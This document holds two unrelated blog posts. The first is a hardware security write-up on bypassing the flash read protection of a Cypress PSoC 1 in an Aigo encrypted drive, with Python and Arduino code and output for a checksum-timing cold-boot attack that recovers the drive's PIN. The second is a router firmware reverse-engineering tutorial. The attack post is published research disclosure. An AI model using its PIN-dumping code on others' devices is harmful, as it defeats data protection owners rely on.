Aigo Chinese encrypted HDD − Part 2: Dumping the Cypress PSoC 1

Original post by Raphaël Rigo on ( under CC-BY-SA 4.0 )


I dumped a Cypress PSoC 1 (CY8C21434) flash memory, bypassing the protection, by doing a cold-boot stepping attack, after reversing the undocumented details of the in-system serial programming protocol (ISSP).

It allows me to dump the PIN of the hard-drive from part 1 directly:

$ ./ 
syncing:  KO  OK
PIN:  1 2 3 4 5 6 7 8 9  



So, as we have seen in part 1, the Cypress PSoC 1 CY8C21434 microcontroller seems like a good target, as it may contain the PIN itself. And anyway, I could not find any public attack code, so I wanted to take a look at it.

Our goal is to read its internal flash memory and so, the steps we have to cover here are to:

  • manage to “talk” to the microcontroller
  • find a way to check if it is protected against external reads (most probably)
  • find a way to bypass the protection

There are 2 places where we can look for the valid PIN:

  • the internal flash memory
  • the SRAM, where it may be stored to compare it to the PIN entered by the user

ISSP Protocol


“Talking” to a micro-controller can imply different things from vendor to vendor but most of them implement a way to interact using a serial protocol (ICSP for Microchip’s PIC for example).

Cypress’ own proprietary protocol is called ISSP for “in-system serial programming protocol”, and is (partially) described in its documentationUS Patent US7185162 also gives some information.

There is also an open source implemention called HSSP, which we will use later.

ISSP basically works like this:

  • reset the µC
  • output a magic number to the serial data pin of the µC to enter external programming mode
  • send commands, which are actually long strings of bits called “vectors”

The ISSP documentation only defines a handful of such vectors:

  • Initialize-1
  • Initialize-2
  • Initialize-3 (3V and 5V variants)
  • SET-BLOCK-NUM: 10011111010dddddddd111 where dddddddd=block #
  • READ-BYTE: 10110aaaaaaZDDDDDDDDZ1 where DDDDDDDD = data out, aaaaaa = address (6 bits)
  • WRITE-BYTE: 10010aaaaaadddddddd111 where dddddddd = data in, aaaaaa = address (6 bits)
  • READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1 where DDDDDDDDDDDDDDDD = Device Checksum data out

For example, the vector for Initialize-2 is:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111

Each vector is 22 bits long and seem to follow some pattern. Thankfully, the HSSP doc gives us a big hint: “ISSP vector is nothing but a sequence of bits representing a set of instructions.”

Demystifying the vectors

Now, of course, we want to understand what’s going on here. At first, I thought the vectors could be raw M8C instructions, but the opcodes did not match.

Then I just googled the first vector and found this research by Ahmed Ismail which, while it does not go into much details, gives a few hints to get started: “Each instruction starts with 3 bits that select 1 out of 4 mnemonics (read RAM location, write RAM location, read register, or write register.) This is followed by the 8-bit address, then the 8-bit data read or written, and finally 3 stop bits.”

Then, reading the Techical reference manual’s section on the Supervisory ROM (SROM) is very useful. The SROM is hardcoded (ROM) in the PSoC and provides functions (like syscalls) for code running in “userland”:

  • 00h : SWBootReset
  • 01h : ReadBlock
  • 02h : WriteBlock
  • 03h : EraseBlock
  • 06h : TableRead
  • 07h : CheckSum
  • 08h : Calibrate0
  • 09h : Calibrate1

By comparing the vector names with the SROM functions, we can match the various operations supported by the protocol with the expected SROM parameters.

This gives us a decoding of the first 3 bits :

  • 100 => “wrmem”
  • 101 => “rdmem”
  • 110 => “wrreg”
  • 111 => “rdreg”

But to fully understand what is going on, it is better to be able to interact with the µC.

Talking to the PSoC

As Dirk Petrautzki already ported Cypress’ HSSP code on Arduino, I used an Arduino Uno to connect to the ISSP header of the keyboard PCB.

Note that over the course of my research, I modified Dirk’s code quite a lot, you can find my fork on GitHub: here, and the corresponding Python script to interact with the Arduino in my cypress_psoc_tools repository.

So, using the Arduino, I first used only the “official” vectors to interact, and in order to try to read the internal ROM using the VERIFY command. Which failed, as expected, most probably because of the flash protection bits.

I then built my own simple vectors to read/write memory/registers.

Note that we can read the whole SRAM, even though the flash is protected !

Identifying internal registers

After looking at the vector’s “disassembly”, I realized that some undocumented registers (0xF8-0xFA) were used to specify M8C opcodes to execute directly !

This allowed me to run various opcodes such as ADDMOV A,XPUSH or JMP, which, by looking at the side effects on all the registers, allowed me to identify which undocumented registers actually are the “usual” ones (AXSP and PC).

In the end, the vector’s “dissassembly” generated by HSSP_disas.rb looks like this, with comments added for clarity:

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00      # reset flags
[DE C0 1C] wrreg SP (f6), 0x00         # reset SP
[9F 07 5C] wrmem KEY1, 0x3A            # Mandatory arg for SSC
[9F 20 7C] wrmem KEY2, 0x03            # same
[DE A0 1C] wrreg PCh (f5), 0x00        # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03        # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80         # RAM pointer for output data
[DF 26 1C] wrreg opc1 (f9), 0x30       # Opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40       # Opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01         # BLOCK ID for SSC call
[DE 00 DC] wrreg A (f0), 0x06          # "Syscall" number : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00       # Opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12   # Undocumented op: execute external opcodes

Security bits

At this point, I am able to interact with the PSoC, but I need reliable information about the protection bits of the flash. I was really surprised that Cypress did not give any mean to the users to check the protection’s status. So, I dug a bit more on Google to finally realize that the HSSP code provided by Cypress was updated after Dirk’s fork.

And lo ! The following new vector appears:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00           # Unknown args
[9F E0 1C] wrmem 0xFF, 0x00           # same
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10         # Undocumented syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

By using this vector (see read_security_data in, we get all the protection bits in SRAM at 0x80, with 2 bits per block.

The result is depressing: everything is protected in “Disable external read and write” mode ; so we cannot even write to the flash to insert a ROM dumper. The only way to reset the protection is to erase the whole chip 🙁

First (failed) attack: ROMX

However, we can try a trick: since we can execute arbitrary opcodes, why not execute ROMX, which is used to read the flash ?

The reasoning here is that the SROM ReadBlock function used by the programming vectors will verify if it is called from ISSP. However, the ROMX opcode probably has no such check.

So, in Python (after adding a few helpers in the Arduino C code):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)        # A = 0
    write_reg(0xF3, i&0xFF)      # X = 0
    exec_opcodes("\x28\x30\x40") # ROMX, HALT, NOP
    byte = read_reg(0xF0)        # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0])  # print ROM byte

Unfortunately, it does not work 🙁 Or rather, it works, but we get our own opcodes (0x28 0x30 0x40) back ! I do not think it was intended as a protection, but rather as an engineering trick: when executing external opcodes, the ROM bus is rewired to a temporary buffer.

Second attack: cold boot stepping

Since ROMX did not work, I thought about using a variation of the trick described in section 3.1 of Johannes Obermaier and Stefan Tatschner’s paper: Shedding too much Light on a Microcontroller’s Firmware Protection.


The ISSP manual give us the following CHECKSUM-SETUP vector:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Which is just a call to SROM function 0x07, documented as follows (emphasis mine):

The Checksum function calculates a 16-bit checksum over a user specifiable number of blocks, within a single Flash bank starting at block zero. The BLOCKID parameter is used to pass in the number of blocks to checksum. A BLOCKID value of ‘1’ will calculate the checksum of only block 0, while a BLOCKID value of ‘0’ will calculate the checksum of 256 blocks in the bank. The 16-bit checksum is returned in KEY1 and KEY2. The parameter KEY1 holds the lower 8 bits of the checksum and the parameter KEY2 holds the upper 8 bits of the checksum. For devices with multiple Flash banks, the checksum func- tion must be called once for each Flash bank. The SROM Checksum function will operate on the Flash bank indicated by the Bank bit in the FLS_PR1 register.

Note that it is an actual checksum: bytes are summed one by one, no fancy CRC here. Also, considering the extremely limited register set of the M8C core, I suspected that the checksum would be directly stored in RAM, most probably in its final location: KEY1 (0xF8) / KEY2 (0xF9).

So the final attack is, in theory:

  1. Connect using ISSP
  2. Start a checksum computation using the CHECKSUM-SETUP vector
  3. Reset the CPU after some time T
  4. Read the RAM to get the current checksum C
  5. Repeat 3. and 4., increasing T a little each time
  6. Recover the flash content by substracting consecutive checkums C

However, we have a problem: the Initialize-1 vector, which we have to send after reset, overwrites KEY1 and KEY:

1100101000000000000000                 # Magic to put the PSoC in prog mode
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A            # Checksum overwritten here
[9F 20 7C] wrmem KEY2, 0x03            # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09          # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00       # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

But this code, overwriting our precious checksum, is just calling Calibrate1 (SROM function 9)… Maybe we can just send the magic to enter prog mode and then read the SRAM ?

And yes, it works !

The Arduino code implementing the attack is quite simple:

    case Cmnd_STK_START_CSUM:
      checksum_delay = ((uint32_t)getch())<<24;
      checksum_delay |= ((uint32_t)getch())<<16;
      checksum_delay |= ((uint32_t)getch())<<8;
      checksum_delay |= getch();
      if(checksum_delay > 10000) {
         ms_delay = checksum_delay/1000;
         checksum_delay = checksum_delay%1000;
      else {
         ms_delay = 0;
  1. It reads the checkum_delay
  2. Starts computing the checkum (send_checksum_v)
  3. Waits for the appropriate amount of time, with some caveats:
    • I lost some time here until I realized delayMicroseconds is precise only up to 16383µs)
    • and then again because delayMicroseconds(0) is totally wrong !
  4. Resets the PSoC to prog mode (without sending the initialization vectors, just the magic)

The final Python code is:

for delay in range(0, 150000):                          # delay in microseconds
    for i in range(0, 10):                              # number of reads for each delay
            reset_psoc(quiet=True)                      # reset and enter prog mode
            send_vectors()                              # send init vectors
            ser.write("\x85"+struct.pack(">I", delay))  # do checksum + reset after delay
            res =                           # read arduino ACK
        except Exception as e:
            print e
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5)  # open serial port
        print "%05d %02X %02X %02X" % (delay,           # read RAM bytes

What it does is simple:

  1. Reset the PSoC (and send the magic)
  2. Send the full initialization vectors
  3. Call the Cmnd_STK_START_CSUM (0x85) function on the Arduino, with a delay argument in microseconds.
  4. Reads the checksum (0xF8 and 0xF9) and the 0xF1 undocumented registers

This, 10 times per 1 microsecond step.

0xF1 is included as it was the only register that seemed to change while computing the checksum. It could be some temporary register used by the ALU ?

Note the ugly hack I use to reset the Arduino using picocom, when it stops responding (I have no idea why).

Reading the results

The output of the Python script looks like this (simplified for readability):

DELAY F1 F8 F9  # F1 is the unknown reg
                # F8 is the checksum LSB
                # F9 is the checksum MSB

00000 03 E1 19
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # Checksum is reset to 0
00017 FB 00 00
00023 F8 00 00
00024 80 80 00  # First byte is 0x0080-0x0000 = 0x80 
00024 80 80 00
00024 80 80 00
00057 CC E7 00  # 2nd byte is 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # I have no idea what's going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # E7 is back ?
00058 D0 17 01
00059 E7 E7 00
00060 17 17 00  # Hmmm
00062 00 17 00
00062 00 17 00
00063 01 17 01  # Oh ! Carry is propagated to MSB
00063 01 17 01
00075 CC 17 01  # So 0x117-0xE7: 0x30

We however have the the problem that since we have a real check sum, a null byte will not change the value, so we cannot only look for changes in the checksum. But, since the full (8192 bytes) computation runs in 0.1478s, which translates to about 18.04µs per byte, we can use this timing to sample the value of the checksum at the right points in time.

Of course at the beginning, everything is “easy” to read as the variation in execution time is negligible. But the end of the dump is less precise as the variability of each run increases:

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

Hence the 10 dumps for each µs of delay. The total running time to dump the 8192 bytes of flash was about 48h.

Reconstructing the flash image

I have not yet written the code to fully recover the flash, taking into account all the timing problems. However, I did recover the beginning. To make sure it was correct, I disassembled it with m8cdis:

0000: 80 67     jmp   0068h         ; Reset vector
0068: 71 10     or    F,010h
006a: 62 e3 87  mov   reg[VLT_CR],087h
006d: 70 ef     and   F,0efh
006f: 41 fe fb  and   reg[CPU_SCR1],0fbh
0072: 50 80     mov   A,080h
0074: 4e        swap  A,SP
0075: 55 fa 01  mov   [0fah],001h
0078: 4f        mov   X,SP
0079: 5b        mov   A,X
007a: 01 03     add   A,003h
007c: 53 f9     mov   [0f9h],A
007e: 55 f8 3a  mov   [0f8h],03ah
0081: 50 06     mov   A,006h
0083: 00        ssc
0122: 18        pop   A
0123: 71 10     or    F,010h
0125: 43 e3 10  or    reg[VLT_CR],010h
0128: 70 00     and   F,000h ; Paging mode changed from 3 to 0
012a: ef 62     jacc  008dh
012c: e0 00     jacc  012dh
012e: 71 10     or    F,010h
0130: 62 e0 02  mov   reg[OSC_CR0],002h
0133: 70 ef     and   F,0efh
0135: 62 e2 00  mov   reg[INT_VC],000h
0138: 7c 19 30  lcall 1930h
013b: 8f ff     jmp   013bh
013d: 50 08     mov   A,008h
013f: 7f        ret

It looks good !

Locating the PIN address

Now that we can read the checksum at arbitrary points in time, we can check easily if and where it changes after:

  • entering a wrong PIN
  • changing the PIN

First, to locate the approximate location, I dumped the checksum in steps for 10ms after reset. Then I entered a wrong PIN and did the same.

The results were not very nice as there’s a lot of variation, but it appeared that the checksum changes between 120000µs and 140000µs of delay. Which was actually completely false and an artefact of delayMicrosecondsdoing non-sense when called with 0.

Then, after losing about 3 hours, I remembered that the SROM’s CheckSum syscall has an argument that allows to specify the number of blocks to checksum ! So we can easily locate the PIN and “bad PIN” counter down to a 64-byte block.

My initial runs gave:

No bad PIN          |   14 tries remaining  |   13 tries remaining
                    |                       |
block 125 : 0x47E2  |   block 125 : 0x47E2  |   block 125 : 0x47E2
block 126 : 0x6385  |   block 126 : 0x634F  |   block 126 : 0x6324
block 127 : 0x6385  |   block 127 : 0x634F  |   block 127 : 0x6324
block 128 : 0x82BC  |   block 128 : 0x8286  |   block 128 : 0x825B

Then I changed the PIN from “123456” to “1234567”, and I got:

No bad try            14 tries remaining
block 125 : 0x47E2    block 125 : 0x47E2
block 126 : 0x63BE    block 126 : 0x6355
block 127 : 0x63BE    block 127 : 0x6355
block 128 : 0x82F5    block 128 : 0x828C

So both the PIN and “bad PIN” counter seem to be stored in block 126.

Dumping block 126

Block 126 should be about 125x64x18 = 144000µs after the start of the checksum. So make sure, I looked for checksum 0x47E2 in my full dump, and it looked more or less correct.

Then, after dumping lots of imprecise (because of timing) data, manually fixing the results and comparing flash values (by staring at them), I finally got the following bytes at delay 145527µs:

PIN          Flash content
1234567      2526272021222319141402
123456       2526272021221919141402
998877       2d2d2c2c23231914141402
0987654      242d2c2322212019141402
123456789    252627202122232c2d1902

It is quite obvious that the PIN is stored directly in plaintext ! The values are not ASCII or raw values but probably reflect the readings from the capacitive keyboard.

Finally, I did some other tests to find where the “bad PIN” counter is, and found this :

Delay  CSUM
145996 56E5 (old: 56E2, val: 03)
146020 571B (old: 56E5, val: 36)
146045 5759 (old: 571B, val: 3E)
146061 57F2 (old: 5759, val: 99)
146083 58F1 (old: 57F2, val: FF) <<---- here
146100 58F2 (old: 58F1, val: 01)

0xFF means “15 tries” and it gets decremented with each bad PIN entered.

Recovering the PIN

Putting everything together, my ugly code for recovering the PIN is:

def dump_pin():
    pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
               0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
    last_csum = 0
    pin_bytes = []
    for delay in range(145495, 145719, 16):
        csum = csum_at(delay, 1)
        byte = (csum-last_csum)&0xFF
        print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
        last_csum = csum
    print "PIN: ",
    for i in range(0, len(pin_bytes)):
        if pin_bytes[i] in pin_map:
            print pin_map[pin_bytes[i]],

Which outputs:

$ ./ 
syncing:  KO  OK
Resetting PSoC:  KO  Resetting PSoC:  KO  Resetting PSoC:  OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN:  1 2 3 4 5 6 7 8 9

Great success !

Note that the delay values I used are probably valid only on the specific PSoC I have.

What’s next ?

So, to sum up on the PSoC side in the context of our Aigo HDD:

  • we can read the SRAM even when it’s protected (by design)
  • we can bypass the flash read protection by doing a cold-boot stepping attack and read the PIN directly

However, the attack is a bit painful to mount because of timing issues. We could improve it by:

  • writing a tool to correctly decode the cold-boot attack output
  • using a FPGA for more precise timings (or use Arduino hardware timers)
  • trying another attack: “enter wrong PIN, reset and dump RAM”, hopefully the good PIN will be stored in RAM for comparison. However, it is not easily doable on Arduino, as it outputs 5V while the board runs on 3.3V.

One very cool thing to try would be to use voltage glitching to bypass the read protection. If it can be made to work, it would give us absolutely accurate reads of the flash, instead of having to rely on checksum readings with poor timings.

As the SROM probably reads the flash protection bits in the ReadBlock “syscall”, we can maybe do the same as in described on Dmitry Nedospasov’s blog, a reimplementation of Chris Gerlinsky’s attack presented at REcon Brussels 2017.

One other fun thing would also be to decap the chip and image it to dump the SROM, uncovering undocumented syscalls and maybe vulnerabilities ?


To conclude, the drive’s security is broken, as it relies on a normal (not hardened) micro-controller to store the PIN… and I have not (yet) checked the data encryption part !

What should Aigo have done ? After reviewing a few encrypted HDD models, I did a presentation at SyScan in 2015 which highlights the challenges in designing a secure and usable encrypted external drive and gives a few options to do something better 🙂

Overall, I spent 2 week-ends and a few evenings, so probably around 40 hours from the very beginning (opening the drive) to the end (dumping the PIN), including writing those 2 blog posts. A very fun and interesting journey 😉


Practical Reverse Engineering Part 5 — Digging Through the Firmware

Projects and learnt lessons on Systems Security, Embedded Development, IoT and anything worth writing about

  • Part 1: Hunting for Debug Ports
  • Part 2: Scouting the Firmware
  • Part 3: Following the Data
  • Part 4: Dumping the Flash
  • Part 5: Digging Through the Firmware

In part 4 we extracted the entire firmware from the router and decompressed it. As I explained then, you can often get most of the firmware directly from the manufacturer’s website: Firmware upgrade binaries often contain partial or entire filesystems, or even entire firmwares.

In this post we’re gonna dig through the firmware to find potentially interesting code, common vulnerabilities, etc.

I’m gonna explain some basic theory on the Linux architecture, disassembling binaries, and other related concepts. Feel free to skip some of the parts marked as [Theory]; the real hunt starts at ‘Looking for the Default WiFi Password Generation Algorithm’. At the end of the day, we’re just: obtaining source code in case we can use it, using grep and common sense to find potentially interesting binaries, and disassembling them to find out how they work.

One step at a time.

Gathering and Analysing Open Source Components

GPL Licenses — What They Are and What to Expect [Theory]

Linux, U-Boot and other tools used in this router are licensed under the General Public License. This license mandates that the source code for any binaries built with GPL’d projects must be made available to anyone who wants it.

Having access to all that source code can be a massive advantage during the reversing process. The kernel and the bootloader are particularly interesting, and not just to find security issues.

When hunting for GPL’d sources you can usually expect one of these scenarios:

  1. The code is freely available on the manufacturer’s website, nicely ordered and completely open to be tinkered with. For instance: apple products or theamazon echo
  2. The source code is available by request
    • They send you an email with the sources you requested
    • They ask you for “a reasonable amount” of money to ship you a CD with the sources
  3. They decide to (illegally) ignore your requests. If this happens to you, consider being nice over trying to get nasty.

In the case of this router, the source code was available on their website, even though it was a huge pain in the ass to find; it took me a long time of manual and automated searching but I ended up finding it in the mobile version of the site:

ls -lh gpl_source

But what if they’re hiding something!? How could we possibly tell whether the sources they gave us are the same they used to compile the production binaries?

Challenges of Binary Verification [Theory]

Theoretically, we could try to compile the source code ourselves and compare the resulting binary with the one we extracted from the device. In practice, that is extremely more complicated than it sounds.

The exact contents of the binary are strongly tied to the toolchain and overall environment they were compiled in. We could try to replicate the environment of the original developers, finding the exact same versions of everything they used, so we can obtain the same results. Unfortunately, most compilers are not built with output replicability in mind; even if we managed to find the exact same version of everything, details like timestamps, processor-specific optimizations or file paths would stop us from getting a byte-for-byte identical match.

If you’d like to read more about it, I can recommend this paper. The authors go through the challenges they had to overcome in order to verify that the official binary releases of the application ‘TrueCrypt’ were not backdoored.

Introduction to the Architecture of Linux [Theory]

In multiple parts of the series, we’ve discussed the different components found in the firmware: bootloader, kernel, filesystem and some protected memory to store configuration data. In order to know where to look for what, it’s important to understand the overall architecture of the system. Let’s quickly review this device’s:

Linux Architecture

The bootloader is the first piece of code to be executed on boot. Its job is to prepare the kernel for execution, jump into it and stop running. From that point on, the kernel controls the hardware and uses it to run user space logic. A few more details on each of the components:

  1. Hardware: The CPU, Flash, RAM and other components are all physically connected
  2. Linux Kernel: It knows how to control the hardware. The developers take the Open Source Linux kernel, write drivers for their specific device and compile everything into an executable Kernel. It manages memory, reads and writes hardware registers, etc. In more complex systems, “kernel modules” provide the possibility of keeping device drivers as separate entities in the file system, and dynamically load them when required; most embedded systems don’t need that level of versatility, so developers save precious resources by compiling everything into the kernel
  3. libc (“The C Library”): It serves as a general purpose wrapper for the System Call API, including extremely common functions like printfmalloc or system. Developers are free to call the system call API directly, but in most cases, it’s MUCH more convenient to use libc. Instead of the extremely common glibc (GNU C library) we usually find in more powerful systems, this device uses a version optimised for embedded devices: uClibc.
  4. User Applications: Executable binaries in /bin/ and shared objects in /lib/(libraries that contain functions used by multiple binaries) comprise most of the high-level logic. Shared objects are used to save space by storing commonly used functions in a single location

Bootloader Source Code

As I’ve mentioned multiple times over this series, this router’s bootloader is U-Boot. U-Boot is GPL licensed, but Huawei failed to include the source code in their website’s release.

Having the source code for the bootloader can be very useful for some projects, where it can help you figure out how to run a custom firmware on the device or modify something; some bootloaders are much more feature-rich than others. In this case, I’m not interested in anything U-Boot has to offer, so I didn’t bother following up on the source code.

Kernel Source Code

Let’s just check out the source code and look for anything that might help. Remember the factory reset button? The button is part of the hardware layer, which means the GPIO pin that detects the button press must be controlled by the drivers. These are the logs we saw coming out of the UART port in a previous post:

UART system restore logs

With some simple grep commands we can see how the different components of the system (kernel, binaries and shared objects) can work together and produce the serial output we saw:

System reset button propagates to user space

Having the kernel can help us find poorly implemented security-related algorithms and other weaknesses that are sometimes considered ‘accepted risks’ by manufacturers. Most importantly, we can use the drivers to compile and run our own OS on the device.

User Space Source Code

As we can see in the GPL release, some components of the user space are also open source, such as busybox and iptables. Given the right (wrong) versions, public vulnerability databases could be enough to find exploits for any of these.

That being said, if you’re looking for 0-days, backdoors or sensitive data, your best bet is not the open source projects. Devic specific and closed source code developed by the manufacturer or one of their providers has not been so heavily tested and may very well be riddled with bugs. Most of this code is stored as binaries in the user space; we’ve got the entire filesystem, so we’re good.

Without the source code for user space binaries, we need to find a way to read the machine code inside them. That’s where disassembly comes in.

Binary Disassembly [Theory]

The code inside every executable binary is just a compilation of instructions encoded as Machine Code so they can be processed by the CPU. Our processor’s datasheet will explain the direct equivalence between assembly instructions and their machine code representations. A disassembler has been given that equivalence so it can go through the binary, find data and machine code andtranslate it into assembly. Assembly is not pretty, but at least it’s human-readable.

Due to the very low-level nature of the kernel, and how heavily it interacts with the hardware, it is incredibly difficult to make any sense of its binary. User space binaries, on the other hand, are abstracted away from the hardware and follow unix standards for calling conventions, binary format, etc. They’re an ideal target for disassembly.

There are lots of disassemblers for popular architectures like MIPS; some better than others both in terms of functionality and usability. I’d say these 3 are the most popular and powerful disassemblers in the market right now:

  • IDA Pro: By far the most popular disassembler/debugger in the market. It is extremely powerful, multi-platform, and there are loads of users, tutorials, plugins, etc. around it. Unfortunately, it’s also VERY expensive; a single person license of the Pro version (required to disassemble MIPS binaries) costs over $1000
  • Radare2: Completely Open Source, uses an impressively advanced command line interface, and there’s a great community of hackers around it. On the other hand, the complex command line interface -necessary for the sheer amount of features- makes for a rather steep learning curve
  • Binary Ninja: Not open source, but reasonably priced at $100 for a personal license, it’s middle ground between IDA and radare. It’s still a very new tool; it was just released this year, but it’s improving and gaining popularity day by day. It already works very well for some architectures, but unfortunately it’s still missing MIPS support (coming soon) and some other features I needed for these binaries. I look forward to giving it another try when it’s more mature

In order to display the assembly code in a more readable way, all these disasemblers use a “Graph View”. It provides an intuitive way to follow the different possible execution flows in the binary:

IDA Small Function Graph View

Such a clear representation of branches, and their conditionals, loops, etc. is extremely useful. Without it, we’d have to manually jump from one branch to another in the raw assembly code. Not so fun.

If you read the code in that function you can see the disassembler makes a great job displaying references to functions and hardcoded strings. That might be enough to help us find something juicy, but in most cases you’ll need to understand the assembly code to a certain extent.

Gathering Intel on the CPU and Its Assembly Code [Theory]

Let’s take a look at the format of our binaries:

$ file bin/busybox
bin/busybox: ELF 32-bit LSB executable, MIPS, MIPS-II version 1 (SYSV), dynamically linked (uses shared libs), corrupted section header size

Because ELF headers are designed to be platform-agnostic, we can easily find out some info about our binaries. As you can see, we know the architecture (32-bit MIPS), endianness (LSB), and whether it uses shared libraries.

We can verify that information thanks to the Ralink’s product brief, which specifies the processor core it uses: MIPS24KEc

Product Brief Highlighted Processor Core

With the exact version of the CPU core, we can easily find its datasheet as released by the company that designed it: Imagination Technologies.

Once we know the basics we can just drop the binary into the disassembler. It will help validate some of our findings, and provide us with the assembly code. In order to understand that code we’re gonna need to know the architecture’s instruction sets and register names:

  • MIPS Instruction Set
  • MIPS Pseudo-Instructions: Very simple combinations of basic instructions, used for developer/reverser convenience
  • MIPS Alternate Register Names: In MIPS, there’s no real difference between registers; the CPU doesn’t about what they’re called. Alternate register names exist to make the code more readable for the developer/reverser: $a0 to $a3 for function arguments, $t0 to $t9 for temporary registers, etc.

Beyond instructions and registers, some architectures may have some quirks. One example of this would be the presence of delay slots in MIPS: Instructions that appear immediately after branch instructions (e.g. beqzjalr) but are actually executed before the jump. That sort of non-linearity would be unthinkable in other architectures.

Some interesting links if you’re trying to learn MIPS: Intro to MIPS Reversing using Radare2MIPS Assembler and Runtime SimulatorToolchains to cross-compile for MIPS targets.

Example of User Space Binary Disassembly

Following up on the reset key example we were using for the Kernel, we’ve got the code that generated some of the UART log messages, but not all of them. Since we couldn’t find the ‘button has been pressed’ string in the kernel’s source code, we can deduce it must have come from user space. Let’s find out which binary printed it:

$ grep -i -r "restore default success" .
Binary file ./bin/cli matches
Binary file ./bin/equipcmd matches
Binary file ./lib/ matches

3 files contain the next string found in the logs: 2 executables in /bin/ and 1 shared object in /lib/. Let’s take a look at /bin/equipcmd with IDA:

restore success string in /bin/equipcmd - IDA GUI

If we look closely, we can almost read the C code that was compiled into these instructions. We can see a “clear configuration file”, which would match the ERASEcommands we saw in the SPI traffic capture to the flash IC. Then, depending on the result, one of two strings is printed: restore default success or restore default fail . On success, it then prints something else, flushes some buffers and reboots; this also matches the behaviour we observed when we pressed the reset button.

That function is a perfect example of delay slots: the addiu instructions that set both strings as arguments —$a0— for the 2 puts are in the delay slots of the branch if equals zero and jump and link register instructions. They will actually be executed before branching/jumping.

As you can see, IDA has the name of all the functions in the binary. That won’t necessarily be the case in other binaries, and now’s a good time to discuss why.

Function Names in a Binary — Intro to Symbol Tables [Theory]

The ELF format specifies the usage of symbol tables: chunks of data inside a binary that provide useful debugging information. Part of that information are human-readable names for every function in the binary. This is extremely convenient for a developer debugging their binary, but in most cases it should be removed before releasing the production binary. The developers were nice enough to leave most of them in there 🙂

In order to remove them, the developers can use tools like strip, which know what must be kept and what can be spared. These tools serve a double purpose: They save memory by removing data that won’t be necessary at runtime, and they make the reversing process much more complicated for potential attackers. Function names give context to the code we’re looking at, which is massively helpful.

